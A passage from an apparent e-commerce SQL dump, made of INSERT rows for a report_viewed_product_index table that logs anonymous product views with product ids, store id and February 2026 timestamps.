(26048, NULL, NULL, 2064, 1, '2026-02-13 03:03:35'),
(26049, NULL, NULL, 2064, 1, '2026-02-13 05:35:39'),
(26050, NULL, NULL, 2054, 1, '2026-02-13 08:16:52'),
(26051, NULL, NULL, 2061, 1, '2026-02-13 08:26:44'),
(26052, NULL, NULL, 2053, 1, '2026-02-13 08:45:12'),
(26053, NULL, NULL, 2058, 1, '2026-02-13 08:45:20'),
(26054, NULL, NULL, 2063, 1, '2026-02-13 09:04:14'),
(26055, NULL, NULL, 2054, 1, '2026-02-13 09:58:54'),
(26056, NULL, NULL, 2060, 1, '2026-02-13 10:48:07'),
(26057, NULL, NULL, 2061, 1, '2026-02-13 11:22:23'),
(26058, NULL, NULL, 2055, 1, '2026-02-13 11:42:18'),
(26059, NULL, NULL, 2061, 1, '2026-02-13 14:28:35'),
(26060, NULL, NULL, 2060, 1, '2026-02-13 14:29:53'),
(26061, NULL, NULL, 2055, 1, '2026-02-13 14:30:26'),
(26062, NULL, NULL, 2058, 1, '2026-02-13 14:30:31'),
(26063, NULL, NULL, 2054, 1, '2026-02-13 14:30:33'),
(26064, NULL, NULL, 2055, 1, '2026-02-13 14:30:47'),
(26065, NULL, NULL, 2053, 1, '2026-02-13 14:31:57'),
(26066, NULL, NULL, 2060, 1, '2026-02-13 14:32:01'),
(26067, NULL, NULL, 2060, 1, '2026-02-13 14:32:19'),
(26068, NULL, NULL, 2060, 1, '2026-02-13 16:14:40'),
(26069, NULL, NULL, 2060, 1, '2026-02-13 16:14:44'),
(26070, NULL, NULL, 2060, 1, '2026-02-13 16:42:23'),
(26071, NULL, NULL, 2060, 1, '2026-02-13 16:42:26'),
(26072, NULL, NULL, 2060, 1, '2026-02-13 18:40:00'),
(26073, NULL, NULL, 2053, 1, '2026-02-13 19:07:18'),
(26074, NULL, NULL, 2064, 1, '2026-02-13 19:18:52'),
(26075, NULL, NULL, 2059, 1, '2026-02-13 20:08:50'),
(26076, NULL, NULL, 2064, 1, '2026-02-13 22:25:05'),
(26077, NULL, NULL, 2063, 1, '2026-02-13 22:38:36'),
(26078, NULL, NULL, 2058, 1, '2026-02-13 22:55:52'),
(26079, NULL, NULL, 2063, 1, '2026-02-13 23:36:00'),
(26080, NULL, NULL, 2061, 1, '2026-02-14 00:44:46'),
(26081, NULL, NULL, 2064, 1, '2026-02-14 00:46:39'),
(26082, NULL, NULL, 2061, 1, '2026-02-14 01:31:03'),
(26083, NULL, NULL, 2063, 1, '2026-02-14 01:51:40'),
(26084, NULL, NULL, 2053, 1, '2026-02-14 02:23:19'),
(26085, NULL, NULL, 2060, 1, '2026-02-14 03:56:46'),
(26086, NULL, NULL, 2060, 1, '2026-02-14 06:46:04'),
(26087, NULL, NULL, 2059, 1, '2026-02-14 06:46:07'),
(26088, NULL, NULL, 2063, 1, '2026-02-14 09:00:46'),
(26089, NULL, NULL, 2061, 1, '2026-02-14 10:14:12'),
(26090, NULL, NULL, 2060, 1, '2026-02-14 10:30:23'),
(26091, NULL, NULL, 2055, 1, '2026-02-14 10:30:24'),
(26092, NULL, NULL, 2054, 1, '2026-02-14 10:31:05'),
(26093, NULL, NULL, 2058, 1, '2026-02-14 10:33:26'),
(26094, NULL, NULL, 2060, 1, '2026-02-14 10:34:51'),
(26095, NULL, NULL, 2058, 1, '2026-02-14 12:02:07'),
(26096, NULL, NULL, 2061, 1, '2026-02-14 12:02:10'),
(26097, NULL, NULL, 2059, 1, '2026-02-14 12:02:11'),
(26098, NULL, NULL, 2054, 1, '2026-02-14 12:02:12'),
(26099, NULL, NULL, 2063, 1, '2026-02-14 12:02:13'),
(26100, NULL, NULL, 2062, 1, '2026-02-14 12:02:14'),
(26101, NULL, NULL, 2055, 1, '2026-02-14 12:02:15'),
(26102, NULL, NULL, 2064, 1, '2026-02-14 12:02:17'),
(26103, NULL, NULL, 2060, 1, '2026-02-14 12:02:21'),
(26104, NULL, NULL, 2053, 1, '2026-02-14 12:02:25'),
(26105, NULL, NULL, 2060, 1, '2026-02-14 12:11:16'),
(26106, NULL, NULL, 2060, 1, '2026-02-14 14:36:37'),
(26107, NULL, NULL, 2054, 1, '2026-02-14 16:40:07'),
(26108, NULL, NULL, 2061, 1, '2026-02-14 16:45:01'),
(26109, NULL, NULL, 2058, 1, '2026-02-14 16:53:48'),
(26110, NULL, NULL, 2062, 1, '2026-02-14 16:57:58'),
(26111, NULL, NULL, 2062, 1, '2026-02-14 16:58:35'),
(26112, NULL, NULL, 2055, 1, '2026-02-14 17:04:16'),
(26113, NULL, NULL, 2054, 1, '2026-02-14 17:14:12'),
(26114, NULL, NULL, 2059, 1, '2026-02-14 17:30:49'),
(26115, NULL, NULL, 2064, 1, '2026-02-14 17:34:34'),
(26116, NULL, NULL, 2062, 1, '2026-02-14 18:02:18'),
(26117, NULL, NULL, 2062, 1, '2026-02-14 18:02:44'),
(26118, NULL, NULL, 2053, 1, '2026-02-14 18:21:12'),
(26119, NULL, NULL, 2053, 1, '2026-02-14 19:15:06'),
(26120, NULL, NULL, 2061, 1, '2026-02-14 20:02:08'),
(26121, NULL, NULL, 2061, 1, '2026-02-14 20:26:36'),
(26122, NULL, NULL, 2059, 1, '2026-02-14 21:46:24'),
(26123, NULL, NULL, 2059, 1, '2026-02-15 00:09:02'),
(26124, NULL, NULL, 2062, 1, '2026-02-15 00:26:34'),
(26125, NULL, NULL, 2062, 1, '2026-02-15 01:25:16'),
(26126, NULL, NULL, 2054, 1, '2026-02-15 02:35:01'),
(26127, NULL, NULL, 2059, 1, '2026-02-15 03:46:35'),
(26128, NULL, NULL, 2054, 1, '2026-02-15 06:32:04'),
(26129, NULL, NULL, 2058, 1, '2026-02-15 06:32:52'),
(26130, NULL, NULL, 2055, 1, '2026-02-15 06:32:53'),
(26131, NULL, NULL, 2060, 1, '2026-02-15 06:35:13'),
(26132, NULL, NULL, 2060, 1, '2026-02-15 06:36:13'),
(26133, NULL, NULL, 2062, 1, '2026-02-15 07:05:30'),
(26134, NULL, NULL, 2054, 1, '2026-02-15 07:16:05'),
(26135, NULL, NULL, 2064, 1, '2026-02-15 07:25:44'),
(26136, NULL, NULL, 2061, 1, '2026-02-15 07:32:09'),
(26137, NULL, NULL, 2060, 1, '2026-02-15 07:35:47'),
(26138, NULL, NULL, 2062, 1, '2026-02-15 08:05:18'),
(26139, NULL, NULL, 2053, 1, '2026-02-15 09:18:52'),
(26140, NULL, NULL, 2053, 1, '2026-02-15 12:46:19'),
(26141, NULL, NULL, 2058, 1, '2026-02-15 12:59:44'),
(26142, NULL, NULL, 2059, 1, '2026-02-15 13:02:35'),
(26143, NULL, NULL, 2055, 1, '2026-02-15 13:12:51'),
(26144, NULL, NULL, 2060, 1, '2026-02-15 14:04:00'),
(26145, NULL, NULL, 2060, 1, '2026-02-15 15:05:52'),
(26146, NULL, NULL, 2061, 1, '2026-02-15 15:14:53'),
(26147, NULL, NULL, 2053, 1, '2026-02-15 15:16:48'),
(26148, NULL, NULL, 2063, 1, '2026-02-15 16:45:25'),
(26149, NULL, NULL, 2062, 1, '2026-02-15 17:21:07'),
(26150, NULL, NULL, 2062, 1, '2026-02-15 17:21:27'),
(26151, NULL, NULL, 2060, 1, '2026-02-15 17:24:38'),
(26152, NULL, NULL, 2060, 1, '2026-02-15 17:24:41'),
(26153, NULL, NULL, 2061, 1, '2026-02-15 17:44:36'),
(26154, NULL, NULL, 2060, 1, '2026-02-15 17:57:57'),
(26155, NULL, NULL, 2060, 1, '2026-02-15 17:58:00'),
(26156, NULL, NULL, 2063, 1, '2026-02-15 18:20:03'),
(26157, NULL, NULL, 2061, 1, '2026-02-15 18:30:20'),
(26158, NULL, NULL, 2064, 1, '2026-02-15 18:39:44'),
(26159, NULL, NULL, 2058, 1, '2026-02-15 18:50:15'),
(26160, NULL, NULL, 2054, 1, '2026-02-15 19:12:58'),
(26161, NULL, NULL, 2062, 1, '2026-02-15 19:32:32'),
(26162, NULL, NULL, 2061, 1, '2026-02-15 20:51:19'),
(26163, NULL, NULL, 2060, 1, '2026-02-16 00:55:40'),
(26164, NULL, NULL, 2062, 1, '2026-02-16 01:34:15'),
(26165, NULL, NULL, 2058, 1, '2026-02-16 02:33:00'),
(26166, NULL, NULL, 2054, 1, '2026-02-16 02:34:01'),
(26167, NULL, NULL, 2060, 1, '2026-02-16 02:35:32'),
(26168, NULL, NULL, 2055, 1, '2026-02-16 02:35:36'),
(26169, NULL, NULL, 2060, 1, '2026-02-16 02:38:06'),
(26170, NULL, NULL, 2063, 1, '2026-02-16 02:57:56'),
(26171, NULL, NULL, 2062, 1, '2026-02-16 03:34:55'),
(26172, NULL, NULL, 2064, 1, '2026-02-16 03:36:24'),
(26173, NULL, NULL, 2053, 1, '2026-02-16 03:48:53'),
(26174, NULL, NULL, 2060, 1, '2026-02-16 03:50:34'),
(26175, NULL, NULL, 2064, 1, '2026-02-16 05:17:22'),
(26176, NULL, NULL, 2064, 1, '2026-02-16 05:17:22'),
(26177, NULL, NULL, 2064, 1, '2026-02-16 05:17:22'),
(26178, NULL, NULL, 2063, 1, '2026-02-16 05:17:23'),
(26179, NULL, NULL, 2061, 1, '2026-02-16 05:17:24'),
(26180, NULL, NULL, 2062, 1, '2026-02-16 05:17:24'),
(26181, NULL, NULL, 2059, 1, '2026-02-16 05:17:24'),
(26182, NULL, NULL, 2060, 1, '2026-02-16 05:17:24'),
(26183, NULL, NULL, 2058, 1, '2026-02-16 05:17:26'),
(26184, NULL, NULL, 2055, 1, '2026-02-16 05:17:26'),
(26185, NULL, NULL, 2063, 1, '2026-02-16 05:17:26'),
(26186, NULL, NULL, 2062, 1, '2026-02-16 05:17:27'),
(26187, NULL, NULL, 2061, 1, '2026-02-16 05:17:27'),
(26188, NULL, NULL, 2059, 1, '2026-02-16 05:17:27'),
(26189, NULL, NULL, 2060, 1, '2026-02-16 05:17:27'),
(26190, NULL, NULL, 2063, 1, '2026-02-16 05:17:28'),
(26191, NULL, NULL, 2062, 1, '2026-02-16 05:17:28'),
(26192, NULL, NULL, 2058, 1, '2026-02-16 05:17:28'),
(26193, NULL, NULL, 2055, 1, '2026-02-16 05:17:29'),
(26194, NULL, NULL, 2061, 1, '2026-02-16 05:17:29'),
(26195, NULL, NULL, 2059, 1, '2026-02-16 05:17:30'),
(26196, NULL, NULL, 2060, 1, '2026-02-16 05:17:30'),
(26197, NULL, NULL, 2058, 1, '2026-02-16 05:17:30'),
(26198, NULL, NULL, 2055, 1, '2026-02-16 05:17:31'),
(26199, NULL, NULL, 2063, 1, '2026-02-16 05:17:32'),
(26200, NULL, NULL, 2061, 1, '2026-02-16 05:17:32'),
(26201, NULL, NULL, 2062, 1, '2026-02-16 05:17:32'),
(26202, NULL, NULL, 2059, 1, '2026-02-16 05:17:32'),
(26203, NULL, NULL, 2060, 1, '2026-02-16 05:17:33'),
(26204, NULL, NULL, 2054, 1, '2026-02-16 05:17:33'),
(26205, NULL, NULL, 2061, 1, '2026-02-16 05:17:33'),
(26206, NULL, NULL, 2063, 1, '2026-02-16 05:17:33'),
(26207, NULL, NULL, 2062, 1, '2026-02-16 05:17:34'),
(26208, NULL, NULL, 2055, 1, '2026-02-16 05:17:34'),
(26209, NULL, NULL, 2058, 1, '2026-02-16 05:17:35'),
(26210, NULL, NULL, 2059, 1, '2026-02-16 05:17:35'),
(26211, NULL, NULL, 2060, 1, '2026-02-16 05:17:35'),
(26212, NULL, NULL, 2055, 1, '2026-02-16 05:17:36'),
(26213, NULL, NULL, 2058, 1, '2026-02-16 05:17:36'),
(26214, NULL, NULL, 2063, 1, '2026-02-16 05:17:37'),
(26215, NULL, NULL, 2062, 1, '2026-02-16 05:17:37'),
(26216, NULL, NULL, 2059, 1, '2026-02-16 05:17:38'),
(26217, NULL, NULL, 2054, 1, '2026-02-16 05:17:38'),
(26218, NULL, NULL, 2060, 1, '2026-02-16 05:17:38'),
(26219, NULL, NULL, 2061, 1, '2026-02-16 05:17:38'),
(26220, NULL, NULL, 2054, 1, '2026-02-16 05:17:38'),
(26221, NULL, NULL, 2058, 1, '2026-02-16 05:17:39'),
(26222, NULL, NULL, 2055, 1, '2026-02-16 05:17:39'),
(26223, NULL, NULL, 2054, 1, '2026-02-16 05:17:40'),
(26224, NULL, NULL, 2063, 1, '2026-02-16 05:19:21'),
(26225, NULL, NULL, 2064, 1, '2026-02-16 05:19:21'),
(26226, NULL, NULL, 2064, 1, '2026-02-16 05:19:21'),
(26227, NULL, NULL, 2061, 1, '2026-02-16 05:19:21'),
(26228, NULL, NULL, 2062, 1, '2026-02-16 05:19:21'),
(26229, NULL, NULL, 2064, 1, '2026-02-16 05:19:22'),
(26230, NULL, NULL, 2060, 1, '2026-02-16 05:19:22'),
(26231, NULL, NULL, 2059, 1, '2026-02-16 05:19:22'),
(26232, NULL, NULL, 2058, 1, '2026-02-16 05:19:23'),
(26233, NULL, NULL, 2055, 1, '2026-02-16 05:19:24'),
(26234, NULL, NULL, 2054, 1, '2026-02-16 05:19:25'),
(26235, NULL, NULL, 2055, 1, '2026-02-16 05:19:27'),
(26236, NULL, NULL, 2054, 1, '2026-02-16 05:19:27'),
(26237, NULL, NULL, 2055, 1, '2026-02-16 05:19:28'),
(26238, NULL, NULL, 2054, 1, '2026-02-16 05:19:29'),
(26239, NULL, NULL, 2053, 1, '2026-02-16 05:32:34'),
(26240, NULL, NULL, 2058, 1, '2026-02-16 09:11:39'),
(26241, NULL, NULL, 2064, 1, '2026-02-16 14:21:42'),
(26242, NULL, NULL, 2060, 1, '2026-02-16 14:23:43'),
(26243, NULL, NULL, 2060, 1, '2026-02-16 14:37:03'),
(26244, NULL, NULL, 2053, 1, '2026-02-16 14:43:59'),
(26245, NULL, NULL, 2061, 1, '2026-02-16 15:05:25'),
(26246, NULL, NULL, 2060, 1, '2026-02-16 15:47:11'),
(26247, NULL, NULL, 2053, 1, '2026-02-16 15:54:56'),
(26248, NULL, NULL, 2061, 1, '2026-02-16 16:29:25'),
(26249, NULL, NULL, 2062, 1, '2026-02-16 18:48:00'),
(26250, NULL, NULL, 2053, 1, '2026-02-16 18:48:01'),
(26251, NULL, NULL, 2054, 1, '2026-02-16 19:40:19'),
(26252, NULL, NULL, 2058, 1, '2026-02-16 19:40:27'),
(26253, NULL, NULL, 2064, 1, '2026-02-16 20:39:16'),
(26254, NULL, NULL, 2058, 1, '2026-02-16 22:32:52'),
(26255, NULL, NULL, 2055, 1, '2026-02-16 22:33:13'),
(26256, NULL, NULL, 2060, 1, '2026-02-16 22:33:56'),
(26257, NULL, NULL, 2064, 1, '2026-02-16 22:34:33'),
(26258, NULL, NULL, 2063, 1, '2026-02-16 22:35:28'),
(26259, NULL, NULL, 2054, 1, '2026-02-16 22:37:04'),
(26260, NULL, NULL, 2060, 1, '2026-02-16 22:37:14'),
(26261, NULL, NULL, 2060, 1, '2026-02-16 23:09:24'),
(26262, NULL, NULL, 2061, 1, '2026-02-16 23:51:57'),
(26263, NULL, NULL, 2061, 1, '2026-02-17 02:42:40'),
(26264, NULL, NULL, 2053, 1, '2026-02-17 04:53:24'),
(26265, NULL, NULL, 2060, 1, '2026-02-17 05:23:24'),
(26266, NULL, NULL, 2053, 1, '2026-02-17 11:21:07'),
(26267, NULL, NULL, 2059, 1, '2026-02-17 13:24:36'),
(26268, NULL, NULL, 2060, 1, '2026-02-17 13:42:37'),
(26269, NULL, NULL, 2061, 1, '2026-02-17 14:30:43'),
(26270, NULL, NULL, 2061, 1, '2026-02-17 14:40:01'),
(26271, NULL, NULL, 2064, 1, '2026-02-17 15:18:16'),
(26272, NULL, NULL, 2064, 1, '2026-02-17 15:19:48'),
(26273, NULL, NULL, 2064, 1, '2026-02-17 15:30:56'),
(26274, NULL, NULL, 2064, 1, '2026-02-17 15:34:52'),
(26275, NULL, NULL, 2064, 1, '2026-02-17 15:40:49');
INSERT INTO `report_viewed_product_index` (`index_id`, `visitor_id`, `customer_id`, `product_id`, `store_id`, `added_at`) VALUES
(26276, NULL, NULL, 2059, 1, '2026-02-17 15:42:31'),
(26277, NULL, NULL, 2060, 1, '2026-02-17 16:13:15'),
(26278, NULL, NULL, 2060, 1, '2026-02-17 16:36:03'),
(26279, NULL, NULL, 2060, 1, '2026-02-17 16:36:06'),
(26280, NULL, NULL, 2060, 1, '2026-02-17 17:02:12'),
(26281, NULL, NULL, 2060, 1, '2026-02-17 17:02:15'),
(26282, NULL, NULL, 2062, 1, '2026-02-17 17:13:18'),
(26283, NULL, NULL, 2062, 1, '2026-02-17 17:13:46'),
(26284, NULL, NULL, 2060, 1, '2026-02-17 18:35:12'),
(26285, NULL, NULL, 2055, 1, '2026-02-17 18:35:13'),
(26286, NULL, NULL, 2058, 1, '2026-02-17 18:39:25'),
(26287, NULL, NULL, 2054, 1, '2026-02-17 18:39:34'),
(26288, NULL, NULL, 2060, 1, '2026-02-17 18:47:29'),
(26289, NULL, NULL, 2053, 1, '2026-02-17 19:38:36'),
(26290, NULL, NULL, 2053, 1, '2026-02-17 20:00:47'),
(26291, NULL, NULL, 2061, 1, '2026-02-17 20:53:40'),
(26292, NULL, NULL, 2060, 1, '2026-02-17 21:42:13'),
(26293, NULL, NULL, 2055, 1, '2026-02-17 22:13:46'),
(26294, NULL, NULL, 2059, 1, '2026-02-17 22:14:56'),
(26295, NULL, NULL, 2060, 1, '2026-02-17 22:18:53'),
(26296, NULL, NULL, 2054, 1, '2026-02-17 23:36:43'),
(26297, NULL, NULL, 2060, 1, '2026-02-18 00:19:20'),
(26298, NULL, NULL, 2055, 1, '2026-02-18 00:35:46'),
(26299, NULL, NULL, 2053, 1, '2026-02-18 01:00:58'),
(26300, NULL, NULL, 2060, 1, '2026-02-18 02:07:20'),
(26301, NULL, NULL, 2055, 1, '2026-02-18 03:09:04'),
(26302, NULL, NULL, 2064, 1, '2026-02-18 05:57:26'),
(26303, NULL, NULL, 2064, 1, '2026-02-18 07:45:58'),
(26304, NULL, NULL, 2058, 1, '2026-02-18 08:33:44'),
(26305, NULL, NULL, 2061, 1, '2026-02-18 09:43:26'),
(26306, NULL, NULL, 2061, 1, '2026-02-18 09:46:37'),
(26307, NULL, NULL, 2062, 1, '2026-02-18 10:34:17'),
(26308, NULL, NULL, 2062, 1, '2026-02-18 12:46:59'),
(26309, NULL, NULL, 2058, 1, '2026-02-18 14:34:54'),
(26310, NULL, NULL, 2060, 1, '2026-02-18 14:36:12'),
(26311, NULL, NULL, 2055, 1, '2026-02-18 14:36:40'),
(26312, NULL, NULL, 2054, 1, '2026-02-18 14:36:41'),
(26313, NULL, NULL, 2060, 1, '2026-02-18 14:38:27'),
(26314, NULL, NULL, 2063, 1, '2026-02-18 14:56:36'),
(26315, NULL, NULL, 2061, 1, '2026-02-18 14:56:40'),
(26316, NULL, NULL, 2059, 1, '2026-02-18 14:56:45'),
(26317, NULL, NULL, 2058, 1, '2026-02-18 14:56:50'),
(26318, NULL, NULL, 2055, 1, '2026-02-18 14:56:54'),
(26319, NULL, NULL, 2054, 1, '2026-02-18 14:56:59'),
(26320, NULL, NULL, 2060, 1, '2026-02-18 14:57:03'),
(26321, NULL, NULL, 2060, 1, '2026-02-18 15:27:38'),
(26322, NULL, NULL, 2053, 1, '2026-02-18 15:45:01'),
(26323, NULL, NULL, 2062, 1, '2026-02-18 16:21:29'),
(26324, NULL, NULL, 2062, 1, '2026-02-18 16:21:44'),
(26325, NULL, NULL, 2059, 1, '2026-02-18 17:50:55'),
(26326, NULL, NULL, 2061, 1, '2026-02-18 18:00:43'),
(26327, NULL, NULL, 2060, 1, '2026-02-18 18:34:10'),
(26328, NULL, NULL, 2054, 1, '2026-02-18 19:22:53'),
(26329, NULL, NULL, 2062, 1, '2026-02-18 19:23:13'),
(26330, NULL, NULL, 2064, 1, '2026-02-18 19:24:32'),
(26331, NULL, NULL, 2055, 1, '2026-02-18 19:26:39'),
(26332, NULL, NULL, 2059, 1, '2026-02-18 19:30:07'),
(26333, NULL, NULL, 2063, 1, '2026-02-18 19:30:15'),
(26334, NULL, NULL, 2060, 1, '2026-02-18 19:34:36'),
(26335, NULL, NULL, 2058, 1, '2026-02-18 19:44:38'),
(26336, NULL, NULL, 2061, 1, '2026-02-18 19:51:22'),
(26337, NULL, NULL, 2053, 1, '2026-02-18 20:00:48'),
(26338, NULL, NULL, 2061, 1, '2026-02-18 20:20:43'),
(26339, NULL, NULL, 2060, 1, '2026-02-18 20:34:10'),
(26340, NULL, NULL, 2055, 1, '2026-02-18 21:17:27'),
(26341, NULL, NULL, 2060, 1, '2026-02-18 21:54:17'),
(26342, NULL, NULL, 2053, 1, '2026-02-18 21:59:43'),
(26343, NULL, NULL, 2064, 1, '2026-02-19 04:19:52'),
(26344, NULL, NULL, 2064, 1, '2026-02-19 04:20:19'),
(26345, NULL, NULL, 2064, 1, '2026-02-19 04:21:34'),
(26346, NULL, NULL, 2064, 1, '2026-02-19 04:50:03'),
(26347, NULL, NULL, 2053, 1, '2026-02-19 05:18:56'),
(26348, NULL, NULL, 2058, 1, '2026-02-19 05:35:39'),
(26349, NULL, NULL, 2055, 1, '2026-02-19 05:35:48'),
(26350, NULL, NULL, 2055, 1, '2026-02-19 05:36:25'),
(26351, NULL, NULL, 2058, 1, '2026-02-19 05:37:11'),
(26352, NULL, NULL, 2055, 1, '2026-02-19 05:37:20'),
(26353, NULL, NULL, 2055, 1, '2026-02-19 05:38:07'),
(26354, NULL, NULL, 2053, 1, '2026-02-19 06:20:01'),
(26355, NULL, NULL, 2060, 1, '2026-02-19 07:58:24'),
(26356, NULL, NULL, 2061, 1, '2026-02-19 08:50:25'),
(26357, NULL, NULL, 2054, 1, '2026-02-19 10:36:07'),
(26358, NULL, NULL, 2060, 1, '2026-02-19 10:36:37'),
(26359, NULL, NULL, 2060, 1, '2026-02-19 10:38:32'),
(26360, NULL, NULL, 2062, 1, '2026-02-19 10:39:23'),
(26361, NULL, NULL, 2058, 1, '2026-02-19 10:40:13'),
(26362, NULL, NULL, 2060, 1, '2026-02-19 10:57:45'),
(26363, NULL, NULL, 2054, 1, '2026-02-19 13:24:58'),
(26364, NULL, NULL, 2053, 1, '2026-02-19 15:00:45'),
(26365, NULL, NULL, 2061, 1, '2026-02-19 15:58:28'),
(26366, NULL, NULL, 2060, 1, '2026-02-19 16:06:02'),
(26367, NULL, NULL, 2060, 1, '2026-02-19 16:06:08'),
(26368, NULL, NULL, 2062, 1, '2026-02-19 16:28:16'),
(26369, NULL, NULL, 2062, 1, '2026-02-19 16:28:46'),
(26370, NULL, NULL, 2060, 1, '2026-02-19 16:31:37'),
(26371, NULL, NULL, 2060, 1, '2026-02-19 16:31:40'),
(26372, NULL, NULL, 2063, 1, '2026-02-19 17:33:28'),
(26373, NULL, NULL, 2062, 1, '2026-02-19 19:59:50'),
(26374, NULL, NULL, 2053, 1, '2026-02-19 20:00:47'),
(26375, NULL, NULL, 2053, 1, '2026-02-19 22:43:26'),
(26376, NULL, NULL, 2061, 1, '2026-02-19 23:29:50'),
(26377, NULL, NULL, 2060, 1, '2026-02-19 23:31:38'),
(26378, NULL, NULL, 2060, 1, '2026-02-20 00:27:47'),
(26379, NULL, NULL, 2061, 1, '2026-02-20 03:38:30'),
(26380, NULL, NULL, 2053, 1, '2026-02-20 05:07:46'),
(26381, NULL, NULL, 2053, 1, '2026-02-20 05:52:10'),
(26382, NULL, NULL, 2054, 1, '2026-02-20 06:36:39'),
(26383, NULL, NULL, 2058, 1, '2026-02-20 06:36:39'),
(26384, NULL, NULL, 2055, 1, '2026-02-20 06:38:53'),
(26385, NULL, NULL, 2060, 1, '2026-02-20 06:40:09'),
(26386, NULL, NULL, 2060, 1, '2026-02-20 06:40:11'),
(26387, NULL, NULL, 2059, 1, '2026-02-20 06:58:18'),
(26388, NULL, NULL, 2053, 1, '2026-02-20 08:16:19'),
(26389, NULL, NULL, 2053, 1, '2026-02-20 08:40:12'),
(26390, NULL, NULL, 2058, 1, '2026-02-20 08:40:18'),
(26391, NULL, NULL, 2055, 1, '2026-02-20 11:42:35'),
(26392, NULL, NULL, 2060, 1, '2026-02-20 13:00:14'),
(26393, NULL, NULL, 2060, 1, '2026-02-20 13:54:38'),
(26394, NULL, NULL, 2061, 1, '2026-02-20 14:08:54'),
(26395, NULL, NULL, 2053, 1, '2026-02-20 14:26:30'),
(26396, NULL, NULL, 2053, 1, '2026-02-20 16:23:57'),
(26397, NULL, NULL, 2062, 1, '2026-02-20 16:39:45'),
(26398, NULL, NULL, 2062, 1, '2026-02-20 16:40:17'),
(26399, NULL, NULL, 2060, 1, '2026-02-20 17:04:07'),
(26400, NULL, NULL, 2064, 1, '2026-02-20 17:04:09'),
(26401, NULL, NULL, 2063, 1, '2026-02-20 17:04:11'),
(26402, NULL, NULL, 2058, 1, '2026-02-20 17:04:13'),
(26403, NULL, NULL, 2061, 1, '2026-02-20 17:04:14'),
(26404, NULL, NULL, 2059, 1, '2026-02-20 17:04:15'),
(26405, NULL, NULL, 2062, 1, '2026-02-20 17:04:17'),
(26406, NULL, NULL, 2054, 1, '2026-02-20 17:04:18'),
(26407, NULL, NULL, 2055, 1, '2026-02-20 17:04:21'),
(26408, NULL, NULL, 2061, 1, '2026-02-20 18:31:56'),
(26409, NULL, NULL, 2064, 1, '2026-02-20 18:50:32'),
(26410, NULL, NULL, 2053, 1, '2026-02-20 20:00:47'),
(26411, NULL, NULL, 2059, 1, '2026-02-20 21:18:00'),
(26412, NULL, NULL, 2061, 1, '2026-02-20 21:18:27'),
(26413, NULL, NULL, 2064, 1, '2026-02-20 21:34:41'),
(26414, NULL, NULL, 2054, 1, '2026-02-20 21:41:59'),
(26415, NULL, NULL, 2061, 1, '2026-02-20 22:37:25'),
(26416, NULL, NULL, 2062, 1, '2026-02-20 22:45:50'),
(26417, NULL, NULL, 2061, 1, '2026-02-20 22:45:58'),
(26418, NULL, NULL, 2063, 1, '2026-02-20 22:46:03'),
(26419, NULL, NULL, 2061, 1, '2026-02-21 00:40:11'),
(26420, NULL, NULL, 2063, 1, '2026-02-21 01:24:49'),
(26421, NULL, NULL, 2064, 1, '2026-02-21 01:45:34'),
(26422, NULL, NULL, 2060, 1, '2026-02-21 02:00:05'),
(26423, NULL, NULL, 2053, 1, '2026-02-21 02:09:51'),
(26424, NULL, NULL, 2063, 1, '2026-02-21 02:15:24'),
(26425, NULL, NULL, 2058, 1, '2026-02-21 02:36:46'),
(26426, NULL, NULL, 2055, 1, '2026-02-21 02:36:47'),
(26427, NULL, NULL, 2058, 1, '2026-02-21 02:36:48'),
(26428, NULL, NULL, 2060, 1, '2026-02-21 02:36:51'),
(26429, NULL, NULL, 2060, 1, '2026-02-21 02:37:36'),
(26430, NULL, NULL, 2054, 1, '2026-02-21 02:42:28'),
(26431, NULL, NULL, 2060, 1, '2026-02-21 06:49:28'),
(26432, NULL, NULL, 2059, 1, '2026-02-21 06:49:33'),
(26433, NULL, NULL, 2061, 1, '2026-02-21 06:56:00'),
(26434, NULL, NULL, 2053, 1, '2026-02-21 07:20:40'),
(26435, NULL, NULL, 2060, 1, '2026-02-21 07:49:59'),
(26436, NULL, NULL, 2058, 1, '2026-02-21 09:24:27'),
(26437, NULL, NULL, 2061, 1, '2026-02-21 10:46:24'),
(26438, NULL, NULL, 2053, 1, '2026-02-21 12:03:21'),
(26439, NULL, NULL, 2062, 1, '2026-02-21 12:37:46'),
(26440, NULL, NULL, 2060, 1, '2026-02-21 12:53:48'),
(26441, NULL, NULL, 2053, 1, '2026-02-21 14:04:25'),
(26442, NULL, NULL, 2062, 1, '2026-02-21 16:42:18'),
(26443, NULL, NULL, 2062, 1, '2026-02-21 16:43:14'),
(26444, NULL, NULL, 2061, 1, '2026-02-21 17:12:01'),
(26445, NULL, NULL, 2060, 1, '2026-02-21 18:29:40'),
(26446, NULL, NULL, 2058, 1, '2026-02-21 19:42:24'),
(26447, NULL, NULL, 2064, 1, '2026-02-21 20:06:25'),
(26448, NULL, NULL, 2059, 1, '2026-02-21 20:33:37'),
(26449, NULL, NULL, 2060, 1, '2026-02-21 21:06:23'),
(26450, NULL, NULL, 2060, 1, '2026-02-21 21:06:26'),
(26451, NULL, NULL, 2060, 1, '2026-02-21 21:37:19'),
(26452, NULL, NULL, 2060, 1, '2026-02-21 21:37:22'),
(26453, NULL, NULL, 2053, 1, '2026-02-21 22:33:33'),
(26454, NULL, NULL, 2060, 1, '2026-02-21 22:37:04'),
(26455, NULL, NULL, 2058, 1, '2026-02-21 22:39:25'),
(26456, NULL, NULL, 2055, 1, '2026-02-21 22:39:39'),
(26457, NULL, NULL, 2060, 1, '2026-02-21 22:40:46'),
(26458, NULL, NULL, 2062, 1, '2026-02-21 22:40:53'),
(26459, NULL, NULL, 2061, 1, '2026-02-22 00:14:52'),
(26460, NULL, NULL, 2053, 1, '2026-02-22 00:47:15'),
(26461, NULL, NULL, 2060, 1, '2026-02-22 00:52:06'),
(26462, NULL, NULL, 2060, 1, '2026-02-22 03:21:58'),
(26463, NULL, NULL, 2055, 1, '2026-02-22 03:42:53'),
(26464, NULL, NULL, 2054, 1, '2026-02-22 03:53:11'),
(26465, NULL, NULL, 2061, 1, '2026-02-22 04:02:58'),
(26466, NULL, NULL, 2058, 1, '2026-02-22 04:13:00'),
(26467, NULL, NULL, 2054, 1, '2026-02-22 04:52:19'),
(26468, NULL, NULL, 2061, 1, '2026-02-22 07:57:40'),
(26469, NULL, NULL, 2060, 1, '2026-02-22 08:33:37'),
(26470, NULL, NULL, 2053, 1, '2026-02-22 08:44:55'),
(26471, NULL, NULL, 2062, 1, '2026-02-22 09:52:51'),
(26472, NULL, NULL, 2062, 1, '2026-02-22 10:18:00'),
(26473, NULL, NULL, 2061, 1, '2026-02-22 12:23:13'),
